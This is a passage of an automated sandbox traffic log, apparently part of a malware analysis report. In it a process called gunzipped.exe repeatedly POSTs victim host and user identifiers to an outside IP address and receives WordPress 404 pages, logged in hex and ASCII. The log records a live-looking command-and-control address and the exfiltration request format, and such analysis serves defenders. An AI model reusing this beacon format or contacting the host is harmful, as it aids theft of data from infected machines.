                          Date: Wed, 17 Apr 2024 01:17:28 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:29.769228935 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:29.769268990 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:29.769309998 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:29.769352913 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:29.769392967 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:29.769438028 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:29.769483089 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:29.769526958 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:29.769985914 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.549737136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:30.128575087 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:30.332182884 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:31.356720924 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:30 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:31.356765985 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:31.356803894 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:31.356844902 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:31.356888056 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:31.356930971 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:31.356973886 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:31.357012987 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:31.357052088 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:31.357089043 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.549738136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:31.711087942 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:31.919425011 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:32.866765022 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:31 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 